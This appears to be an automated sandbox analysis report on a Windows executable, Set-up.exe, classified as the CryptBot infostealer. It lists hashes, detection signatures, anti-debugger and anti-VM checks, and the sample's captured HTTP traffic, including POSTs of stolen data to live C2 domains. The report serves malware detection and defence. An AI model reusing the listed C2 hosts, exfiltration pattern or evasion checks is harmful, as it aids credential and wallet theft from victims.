Windows Analysis Report
Set-up.exe

Overview

General Information

Sample name: Set-up.exe
Analysis ID: 1584736
MD5: 82f12257874f42d2f2475ca1d9189e43
SHA1: 24e0e7493e9bcc17d4858f350c6a6694f4a5acc5
SHA256: b75aaedf296ec3b596c58573077667f403ed73b18ec052ed9b68b21414671a72
Tags: CryptBot, exe, user-aachum

Detection

Cryptbot
Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Cryptbot
C2 URLs / IPs found in malware configuration
Contains functionality to detect virtual machines
Infostealer behavior detected
Leaks process information
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
AV process strings found (often used to terminate AV products)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected potential crypto function
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Set-up.exe (PID: 6512 cmdline: "C:\Users\user\Desktop\Set-up.exe" MD5: 82F12257874F42D2F2475CA1D9189E43)
  • cleanup
Name: CryptBot
Description: A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot
{"C2 list": ["thirttj13vs.top", "home.thirttj13vs.top"]}
Source: Process Memory Space: Set-up.exe PID: 6512
Rule: JoeSecurity_Cryptbot_1
Description: Yara detected Cryptbot
Author: Joe Security
    No Sigma rule has matched
    No Suricata rule has matched

    AV Detection

    Source: Set-up.exe.6512.0.memstrmin Malware Configuration Extractor: Cryptbot {"C2 list": ["thirttj13vs.top", "home.thirttj13vs.top"]}
    Source: Set-up.exe Virustotal: Detection: 33%
    Source: Set-up.exe ReversingLabs: Detection: 28%
    Source: C:\Users\user\Desktop\Set-up.exe Code function: 0_2_00498E90 Sleep,_open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext,0_2_00498E90
    Source: C:\Users\user\Desktop\Set-up.exe Code function: 0_2_00631870 GetVersion,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,GetLastError,__acrt_iob_func,_time32,GetLastError,__acrt_iob_func,0_2_00631870
    Source: C:\Users\user\Desktop\Set-up.exe Code function: 0_2_0034F6E0 wcscmp,CryptAcquireContextW,CryptGetUserKey,GetLastError,GetLastError,CryptReleaseContext,0_2_0034F6E0
    Source: C:\Users\user\Desktop\Set-up.exe Code function: 0_2_00351B40 MultiByteToWideChar,MultiByteToWideChar,CryptAcquireContextW,CryptGetProvParam,CryptGetProvParam,CryptGetProvParam,GetLastError,GetLastError,CryptReleaseContext,GetLastError,CryptReleaseContext,0_2_00351B40
    Source: C:\Users\user\Desktop\Set-up.exe Code function: -----BEGIN PUBLIC KEY----- 0_2_0013DCF0
    Source: Set-up.exe Binary or memory string: -----BEGIN PUBLIC KEY-----
    Source: Set-up.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
    Source: Set-up.exe Static PE information: DYNAMIC_BASE, NX_COMPAT
    Source: C:\Users\user\Desktop\Set-up.exe Code function: 0_2_0011255D GetSystemInfo,GetSystemInfo,GlobalMemoryStatusEx,GlobalMemoryStatusEx,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA,GetDiskFreeSpaceExA,GetDiskFreeSpaceExA,strlen,EnumDisplayMonitors,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,SHGetKnownFolderPath,wcscpy,wcscat,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,K32EnumProcesses,GetTickCount64,0_2_0011255D
    Source: C:\Users\user\Desktop\Set-up.exe Code function: 0_2_001129FF FindFirstFileA,FindFirstFileA,RegOpenKeyExA,RegOpenKeyExA,GetModuleFileNameA,CharUpperA,CharUpperA,strstr,CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,OpenProcess,QueryFullProcessImageNameA,QueryFullProcessImageNameA,CharUpperA,CloseHandle,CloseHandle,strstr,CreateToolhelp32Snapshot,Process32First,strncpy,_strlwr_s,strstr,strstr,strstr,strstr,CloseHandle,Process32Next,CloseHandle,CloseHandle,EnumWindows,EnumWindows,GetTickCount64,0_2_001129FF
    Source: C:\Users\user\Desktop\Set-up.exe Code function: 0_2_002EE270 _errno,FindNextFileW,WideCharToMultiByte,strlen,_errno,calloc,MultiByteToWideChar,MultiByteToWideChar,_errno,GetLastError,MultiByteToWideChar,wcscpy,FindFirstFileW,free,_errno,0_2_002EE270

    Networking

    Source: Malware configuration extractor URLs: thirttj13vs.top
    Source: Malware configuration extractor URLs: home.thirttj13vs.top
    Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1 Host: httpbin.org Accept: */*
    Source: global traffic HTTP traffic detected: POST /gbVspuhpvozlydclqfRi1736138767 HTTP/1.1 Host: home.thirttj13vs.top Accept: */* Content-Type: application/json Content-Length: 577840
    Source: global traffic HTTP traffic detected: GET /gbVspuhpvozlydclqfRi1736138767?argument=0 HTTP/1.1 Host: home.thirttj13vs.top Accept: */*
    Source: global traffic HTTP traffic detected: POST /gbVspuhpvozlydclqfRi1736138767 HTTP/1.1 Host: home.thirttj13vs.top Accept: */* Content-Type: application/json Content-Length: 31 Data Ascii: { "id1": "0", "data": "Done1" }
    Source: Joe Sandbox View IP Address: 34.147.147.173
    Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: C:\Users\user\Desktop\Set-up.exe Code function: 0_2_001DA870 recv,0_2_001DA870
    Source: global traffic DNS traffic detected: DNS query: httpbin.org
    Source: global traffic DNS traffic detected: DNS query: home.thirttj13vs.top
    Source: unknown HTTP traffic detected: POST /gbVspuhpvozlydclqfRi1736138767 HTTP/1.1 Host: home.thirttj13vs.top Accept: */* Content-Type: application/json Content-Length: 577840
    Source: global traffic HTTP traffic detected: HTTP/1.1 404 NOT FOUND server: nginx/1.22.1 date: Mon, 06 Jan 2025 11:15:06 GMT content-type: text/html; charset=utf-8 content-length: 207 Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
    Source: global traffic HTTP traffic detected: HTTP/1.1 404 NOT FOUND server: nginx/1.22.1 date: Mon, 06 Jan 2025 11:15:07 GMT content-type: text/html; charset=utf-8 content-length: 207 Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
    Source: Set-up.exe String found in binary or memory: http://.css
    Source: Set-up.exe String found in binary or memory: http://.jpg
    Source: Set-up.exe, Set-up.exe, 00000000.00000003.1766598511.0000000001593000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1766768289.0000000001597000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1766658323.0000000001596000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmp, Set-up.exe, 00000000.00000002.1768202774.000000000159B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://home.thirttj13vs.top/gbVspuhpvozlydclqfRi1736138767
    Source: Set-up.exe, 00000000.00000003.1766598511.0000000001593000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1766768289.0000000001597000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1766658323.0000000001596000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1768202774.000000000159B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://home.thirttj13vs.top/gbVspuhpvozlydclqfRi17361387675a1
    Source: Set-up.exe, 00000000.00000003.1766598511.0000000001593000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1766768289.0000000001597000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1766658323.0000000001596000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1768202774.000000000159B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://home.thirttj13vs.top/gbVspuhpvozlydclqfRi1736138767963
    Source: Set-up.exe, 00000000.00000002.1768202774.000000000159B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://home.thirttj13vs.top/gbVspuhpvozlydclqfRi1736138767?argu
    Source: Set-up.exe, 00000000.00000003.1739526627.00000000015C9000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1751160125.00000000015CB000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1768172601.0000000001591000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1751327184.00000000015CB000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1768247839.00000000015CB000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1751238014.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1751269153.00000000015C9000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1739584066.00000000015CB000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1766523089.00000000015CB000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1766598511.000000000158D000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1739497869.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1766788259.0000000001591000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1766966328.0000000001591000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://home.thirttj13vs.top/gbVspuhpvozlydclqfRi1736138767?argument=0
    Source: Set-up.exe, 00000000.00000002.1768172601.0000000001591000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1766598511.000000000158D000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1766788259.0000000001591000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1766966328.0000000001591000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://home.thirttj13vs.top/gbVspuhpvozlydclqfRi1736138767?argument=0S
    Source: Set-up.exe, 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: http://home.thirttj13vs.top/gbVspuhpvozlydclqfRi1736138767http://home.thirttj13vs.top/gbVspuhpvozlyd
    Source: Set-up.exe String found in binary or memory: http://home.thirttj13vs.top/gbVspuhpvozlydclqfRi67
    Source: Set-up.exe String found in binary or memory: http://html4/loose.dtd
    Source: Set-up.exe String found in binary or memory: http://timestamp.digicert.com0
    Source: Set-up.exe String found in binary or memory: https://curl.se/docs/alt-svc.html
    Source: Set-up.exe String found in binary or memory: https://curl.se/docs/alt-svc.html#
    Source: Set-up.exe String found in binary or memory: https://curl.se/docs/hsts.html
    Source: Set-up.exe String found in binary or memory: https://curl.se/docs/hsts.html#
    Source: Set-up.exe String found in binary or memory: https://curl.se/docs/http-cookies.html
    Source: Set-up.exe String found in binary or memory: https://httpbin.org/ip
    Source: Set-up.exe String found in binary or memory: https://httpbin.org/ipbefore
    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
    Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
    Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 001550A0 appears 34 times
    Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 002C7120 appears 45 times
    Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 001175A0 appears 365 times
    Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 002C7220 appears 776 times
    Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 002ECA40 appears 98 times
    Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 00154FD0 appears 120 times
    Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 00154F40 appears 148 times
    Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 001F44A0 appears 43 times
    Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 001171E0 appears 33 times
    Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 00498B80 appears 31 times
    Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 0011CAA0 appears 37 times
    Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 002EA170 appears 58 times
    Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 002ECBC0 appears 501 times
    Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 001173F0 appears 62 times
    Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 002EC9B0 appears 97 times
    Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 00229720 appears 40 times
    Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 002EE710 appears 31 times
    Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 002C7310 appears 44 times
    Source: Set-up.exeStatic PE information: invalid certificate
    Source: Set-up.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
    Source: Set-up.exeBinary string: Lntdll.dllNtCreateFileNtDeviceIoControlFileNtCancelIoFileEx\Device\Afd
    Source: classification engineClassification label: mal84.troj.spyw.evad.winEXE@1/0@9/2
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0012D090 GetLastError,_errno,__sys_nerr,__sys_errlist,FormatMessageW,wcstombs,strchr,strlen,strcpy,strrchr,strrchr,_errno,GetLastError,SetLastError,_errno,_errno,GetLastError,0_2_0012D090
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0011255D GetSystemInfo,GetSystemInfo,GlobalMemoryStatusEx,GlobalMemoryStatusEx,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA,GetDiskFreeSpaceExA,GetDiskFreeSpaceExA,strlen,EnumDisplayMonitors,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,SHGetKnownFolderPath,wcscpy,wcscat,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,K32EnumProcesses,GetTickCount64,0_2_0011255D
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_001129FF FindFirstFileA,FindFirstFileA,RegOpenKeyExA,RegOpenKeyExA,GetModuleFileNameA,CharUpperA,CharUpperA,strstr,CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,OpenProcess,QueryFullProcessImageNameA,QueryFullProcessImageNameA,CharUpperA,CloseHandle,CloseHandle,strstr,CreateToolhelp32Snapshot,Process32First,strncpy,_strlwr_s,strstr,strstr,strstr,strstr,CloseHandle,Process32Next,CloseHandle,CloseHandle,EnumWindows,EnumWindows,GetTickCount64,0_2_001129FF
    Source: C:\Users\user\Desktop\Set-up.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
    Source: Set-up.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\Set-up.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Users\user\Desktop\Set-up.exe File read: C:\Windows\System32\drivers\etc\hosts
    Source: Set-up.exeVirustotal: Detection: 33%
    Source: Set-up.exeReversingLabs: Detection: 28%
    Source: Set-up.exeString found in binary or memory: set-addPolicy
    Source: Set-up.exeString found in binary or memory: in-addr.arpa
    Source: Set-up.exeString found in binary or memory: t xml:space=.gif" border="0"</body> </html> overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script> /favicon.ico" />operating system" style="width:1target="_blank">State Universitytext-align:left; document.write(, including the around t
    Source: Set-up.exeString found in binary or memory: Unable to complete request for channel-process-startup
    Source: Set-up.exeString found in binary or memory: id-cmc-addExtensions
    Source: Set-up.exeString found in binary or memory: iphlpapi.dllif_nametoindexkernel32LoadLibraryExA\/AddDllDirectorysystem_win32.c@
    Source: Set-up.exeString found in binary or memory: 8L0123456789abcdefin-addr.arpaip6.arpa
    Source: Set-up.exeString found in binary or memory: JM[\Unable to allocate space for channel dataFailed allocating memory for channel type nameUnable to allocate temporary space for packetWould block sending channel-open requestUnable to send channel-open requestWould blockUnexpected errorUnexpected packet sizeChannel open failure (administratively prohibited)Channel open failure (connect failed)Channel open failure (unknown channel type)Channel open failure (resource shortage)Channel open failureUnable to allocate memory for setenv packetcancel-tcpip-forwardWould block sending forward requestUnable to send global-request packet for forward listen requestauth-agent-req@openssh.comauth-agent-reqcdChannel can not be reusedUnable to allocate memory for channel-process requestWould block sending channel requestUnable to send channel requestFailed waiting for channel successUnable to complete request for channel-process-startupUnexpected packet lengthUnable to allocate memory for signal nameWould block sending window adjustUnable to send transfer-window adjustment packet, deferringtransport readwould blockWe have already closed this channelEOF has already been received, data might be ignoredFailure while draining incoming flowUnable to send channel dataUnable to send EOF, but closing channel anywayWould block sending close-channelUnable to send close-channel request, but closing anywaysessionchannel.cUnable to allocate memory for direct-tcpip connectiondirect-tcpipUnable to allocate memory for direct-streamlocal connectiondirect-streamlocal@openssh.comQR0.0.0.0tcpip-forwardWould block sending global-request packet for forward listen requestUnknownUnable to allocate memory for listener queueUnable to complete request for forward-listenWould block waiting for packetChannel not foundcdenvWould block sending setenv requestUnable to send channel-request packet for setenv requestFailed getting response for channel-setenvUnable to complete request for channel-setenvcdWould 
block sending auth-agent requestUnable to send auth-agent requestFailed to request auth-agentUnable to complete request for auth-agentcdterm + mode lengths too largepty-reqWould block sending pty requestUnable to send pty-request packetFailed to require the PTY packageUnable to complete request for channel request-ptywindow-changeWould block sending window-change requestUnable to send window-change packetcdUnable to allocate memory for pty-requestx11-reqMIT-MAGIC-COOKIE-1Unable to get random bytes for x11-req cookie%02XWould block sending X11-req packetUnable to send x11-req packetwaiting for x11-req response packetUnable to complete request for channel x11-reqWould block sending EOFUnable to send EOF on channelReceiving channel window has been exhausted_libssh2_transport_read() bailed out!libssh2_channel_wait_closed() invoked when channel is not in EOF stateUnable to allocate memory for signal requestsignalWould block sending signal requestUnable to send signal packetecdsa-sha2-nistp256ecdsa-sha2-nistp384ecdsa-sha2-nistp521blocksize <= siz
    Source: Set-up.exeString found in binary or memory: overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script>
    Source: C:\Users\user\Desktop\Set-up.exe Section loaded: apphelp.dll
    Source: C:\Users\user\Desktop\Set-up.exe Section loaded: iphlpapi.dll
    Source: C:\Users\user\Desktop\Set-up.exe Section loaded: cryptbase.dll
    Source: C:\Users\user\Desktop\Set-up.exe Section loaded: cryptsp.dll
    Source: C:\Users\user\Desktop\Set-up.exe Section loaded: rsaenh.dll
    Source: C:\Users\user\Desktop\Set-up.exe Section loaded: dhcpcsvc6.dll
    Source: C:\Users\user\Desktop\Set-up.exe Section loaded: dhcpcsvc.dll
    Source: C:\Users\user\Desktop\Set-up.exe Section loaded: dnsapi.dll
    Source: C:\Users\user\Desktop\Set-up.exe Section loaded: napinsp.dll
    Source: C:\Users\user\Desktop\Set-up.exe Section loaded: pnrpnsp.dll
    Source: C:\Users\user\Desktop\Set-up.exe Section loaded: wshbth.dll
    Source: C:\Users\user\Desktop\Set-up.exe Section loaded: nlaapi.dll
    Source: C:\Users\user\Desktop\Set-up.exe Section loaded: mswsock.dll
    Source: C:\Users\user\Desktop\Set-up.exe Section loaded: winrnr.dll
    Source: C:\Users\user\Desktop\Set-up.exe Section loaded: uxtheme.dll
    Source: C:\Users\user\Desktop\Set-up.exe Section loaded: windows.storage.dll
    Source: C:\Users\user\Desktop\Set-up.exe Section loaded: wldp.dll
    Source: C:\Users\user\Desktop\Set-up.exe Section loaded: windowscodecs.dll
    Source: C:\Users\user\Desktop\Set-up.exe Section loaded: kernel.appcore.dll
    Source: Set-up.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
    Source: Set-up.exeStatic file information: File size 7745160 > 1048576
    Source: Set-up.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x52a800
    Source: Set-up.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x151c00
    Source: Set-up.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_001114E0 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,0_2_001114E0
    Source: Set-up.exeStatic PE information: section name: .eh_fram
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_015A0709 push esp; retf 0_3_015A0711
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_015A0730 push eax; ret 0_3_015A0731
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_015A4728 push ebx; ret 0_3_015A4729
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_015A20D3 pushfd ; iretd 0_3_015A2151

    Malware Analysis System Evasion

    Source: C:\Users\user\Desktop\Set-up.exeCode function: C:\Windows\System32\VBox*.dll vbox_first SYSTEM\ControlSet001\Services\VBoxSF vbox_second 0_2_001129FF
    Source: Set-up.exeBinary or memory string: PROCMON.EXE
    Source: Set-up.exeBinary or memory string: X64DBG.EXE
    Source: Set-up.exeBinary or memory string: WINDBG.EXE
    Source: Set-up.exeBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
    Source: Set-up.exeBinary or memory string: WIRESHARK.EXE
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_002F9980 rdtsc 0_2_002F9980
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_001129FF FindFirstFileA,FindFirstFileA,RegOpenKeyExA,RegOpenKeyExA,GetModuleFileNameA,CharUpperA,CharUpperA,strstr,CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,OpenProcess,QueryFullProcessImageNameA,QueryFullProcessImageNameA,CharUpperA,CloseHandle,CloseHandle,strstr,CreateToolhelp32Snapshot,Process32First,strncpy,_strlwr_s,strstr,strstr,strstr,strstr,CloseHandle,Process32Next,CloseHandle,CloseHandle,EnumWindows,EnumWindows,GetTickCount64,0_2_001129FF
    Source: C:\Users\user\Desktop\Set-up.exeAPI coverage: 7.2 %
    Source: C:\Users\user\Desktop\Set-up.exe File Volume queried: C:\ FullSizeInformation
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0011255D GetSystemInfo,GetSystemInfo,GlobalMemoryStatusEx,GlobalMemoryStatusEx,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA,GetDiskFreeSpaceExA,GetDiskFreeSpaceExA,strlen,EnumDisplayMonitors,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,SHGetKnownFolderPath,wcscpy,wcscat,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,K32EnumProcesses,GetTickCount64,0_2_0011255D
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_002EE270 _errno,FindNextFileW,WideCharToMultiByte,strlen,_errno,calloc,MultiByteToWideChar,MultiByteToWideChar,_errno,GetLastError,MultiByteToWideChar,wcscpy,FindFirstFileW,free,_errno,0_2_002EE270
    Source: Set-up.exeBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
    Source: Set-up.exe, 00000000.00000003.1766598511.0000000001593000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1766768289.0000000001597000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1768219322.00000000015AD000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1766658323.0000000001596000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1766831207.00000000015AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll": 1932 }, { "name": "svchost.exe", "pid": 2064 }, { "name": "svchost.exe", "pid": 2152 }, { "name": "svchost.exe", "pid": 2216 }, { "name": "svchost.exe", "pid": 2268 }, { "name": "svchost.exe", "pid": 2388 }, { "name": "svchost.exe", "pid": 2396 }, { "name": "svchost.exe", "pid": 2508 }, { "name": "svchost.exe", "pid": 2528 }, { "name": "OfficeClickToRun.exe", "pid": 2552 }, { "name": "svchost.exe", "pid": 2608 }, { "name": "svchost.exe", "pid": 2616
    Source: Set-up.exeBinary or memory string: Hyper-V RAW
    Source: Set-up.exeBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
    Source: Set-up.exe, 00000000.00000003.1679622239.0000000001387000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFsion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}00000FF1CE}\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}
    Source: Set-up.exe, 00000000.00000003.1678980798.0000000001543000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: C:\Users\user\Desktop\Set-up.exe Process information queried: ProcessInformation
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_001114E0 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,0_2_001114E0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0011116C Sleep,Sleep,SetUnhandledExceptionFilter,_set_invalid_parameter_handler,__p__acmdln,malloc,strlen,malloc,memcpy,_initterm,GetStartupInfoA,_cexit,_initterm,exit,0_2_0011116C
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00111160 Sleep,SetUnhandledExceptionFilter,_set_invalid_parameter_handler,__p__acmdln,malloc,strlen,malloc,memcpy,0_2_00111160
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_001111A3 Sleep,SetUnhandledExceptionFilter,_set_invalid_parameter_handler,__p__acmdln,malloc,strlen,malloc,memcpy,0_2_001111A3
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_001113C9 SetUnhandledExceptionFilter,_set_invalid_parameter_handler,__p__acmdln,malloc,strlen,malloc,memcpy,_initterm,0_2_001113C9
    Source: C:\Users\user\Desktop\Set-up.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_002F93D0 GetSystemTime,SystemTimeToFileTime,0_2_002F93D0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00631870 GetVersion,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,GetLastError,__acrt_iob_func,_time32,GetLastError,__acrt_iob_func,0_2_00631870
    Source: C:\Users\user\Desktop\Set-up.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
    Source: Set-up.exe, Set-up.exe, 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: procmon.exe
    Source: Set-up.exe, Set-up.exe, 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: wireshark.exe

    Stealing of Sensitive Information

    Source: Yara matchFile source: Process Memory Space: Set-up.exe PID: 6512, type: MEMORYSTR
    Source: Signature ResultsSignatures: Mutex created, HTTP post and idle behavior
    Source: global trafficTCP traffic: 192.168.2.4:49731 -> 34.147.147.173:80

    Remote Access Functionality

    Source: Yara matchFile source: Process Memory Space: Set-up.exe PID: 6512, type: MEMORYSTR
